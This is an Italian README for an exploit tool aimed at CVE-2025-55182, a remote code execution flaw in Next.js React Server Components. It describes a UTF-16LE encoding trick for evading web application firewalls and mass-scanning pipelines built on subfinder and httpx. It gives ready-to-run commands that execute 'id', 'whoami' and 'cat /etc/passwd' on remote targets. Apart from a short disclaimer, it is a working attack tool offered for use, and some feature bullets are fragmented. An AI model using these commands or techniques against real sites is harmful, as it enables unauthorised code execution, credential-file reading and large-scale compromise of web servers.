
Strumento di exploit per React Shell e Next.js RSC (CVE-2025-55182)
I payload standard che contengono parole chiave come child_process o execSync vengono spesso bloccati dai firewall per applicazioni web (WAF).
NextRCSWaff.py utilizza un motore di codifica specializzato UTF-16LE (Little Endian). Codificando il payload malevolo in questo formato specifico, la sequenza di byte cambia completamente, rendendolo invisibile alla maggior parte dei WAF basati su firme. Tuttavia, il server Next.js (Node.js) decodifica ed esegue correttamente il comando.
Prova di concetto: Lo screenshot sopra mostra un payload standard bloccato (in alto), seguito da un'esecuzione RCE riuscita utilizzando NextRCSWaff.py con il flag --bypass (in basso).
NextRce è uno strumento di sicurezza ad alte prestazioni e multithread progettato per rilevare e sfruttare CVE-2025-55182. Prende di mira specificamente l'implementazione dei React Server Components (RSC) all'interno dell'architettura App Router di Next.js.
Manipolando il processo di serializzazione nelle Server Actions, NextRce inietta un payload appositamente costruito per ottenere l'esecuzione remota di codice (RCE) su istanze vulnerabili. Dispone di un motore di rilevamento intelligente che distingue automaticamente tra architetture App Router vulnerabili e i più sicuri legacy Pages Router, garantendo efficienza durante le scansioni di massa.
window.__next_f) per identificare i target vulnerabili con App Router rispetto ai siti legacy con Pages Router.stdin. Si integra perfettamente con strumenti di ricognizione come subfinder, httpx e gau.ThreadPoolExecutor integrato consente di scansionare migliaia di domini contemporaneamente con un overhead minimo di risorse.L'App Router di Next.js utilizza un formato di serializzazione personalizzato per i React Server Components (RSC). La vulnerabilità risiede nella logica di deserializzazione degli header Next-Action. Quando un oggetto appositamente costruito (che inquina il __proto__) viene inviato a un endpoint di server action (ad es. /adfa), il parser interno può essere indotto a eseguire codice Node.js arbitrario tramite child_process.
X-Powered-By: Next.js e di specifiche strutture di percorso (/_next/).window.__next_f -> Vulnerabile (App Router)__NEXT_DATA__ -> Sicuro (Pages Router)execSync(cmd). Lo stdout viene codificato in base64 e restituito nel campo digest della risposta di errore del server, che NextRce decodifica e visualizza.# Clone the repository
git clone [https://github.com/ynsmroztas/NextRce.git](https://github.com/ynsmroztas/NextRce.git)
# Navigate to the directory
cd NextRce
# Install dependencies
pip install requests
💻 Esempi di utilizzo
# Enable UTF-16LE encoding with the --bypass flag
python3 NextRCSWaff.py -u https://target.com) -c "whoami" --bypass
# Standard scan
subfinder -d target.com -silent | httpx -sc -td -title -server -silent | python3 nextrce.py -c "id" -t 50
# WAF Bypass scan
subfinder -d target.com -silent | httpx -sc -td -title -server -silent | python3 NextRCSWaff.py -c "id" -B
python3 nextrce.py -u https://vulnerable.target.com -c "cat /etc/passwd"
python3 nextrce.py -l targets.txt -c "whoami" -t 100
python3 nextrce.py -u https://target.com -p http://127.0.0.1:8080
⚙️ Opzioni della riga di comando
Flag,Descrizione,Predefinito "-u, --url",URL singolo del target da scansionare,None "-l, --list",Percorso del file contenente un elenco di URL,None "-c, --cmd",Comando da eseguire sul server,id "-t, --threads",Numero di thread concorrenti,30 "-p, --proxy","URL del proxy HTTP (ad es. http://127.0.0.1:8080)",None "-v, --verbose",Abilita l'output verboso (mostra i tentativi falliti),False "-B, --bypass",(solo NextRCSWaff.py) Abilita la codifica UTF-16LE per bypassare i WAF,False
⚠️ Disclaimer Questo strumento è stato sviluppato esclusivamente per scopi educativi e di ricerca sulla sicurezza. L'autore (Mitsec) non è responsabile per qualsiasi uso illegale, danno o accesso non autorizzato causato da questo strumento. Ottieni sempre il permesso esplicito del proprietario del sistema prima di eseguire qualsiasi test di sicurezza.
👤 Autore NextRce è sviluppato e mantenuto da Mitsec.
Twitter/X: @ynsmroztas
GitHub: ynsmroztas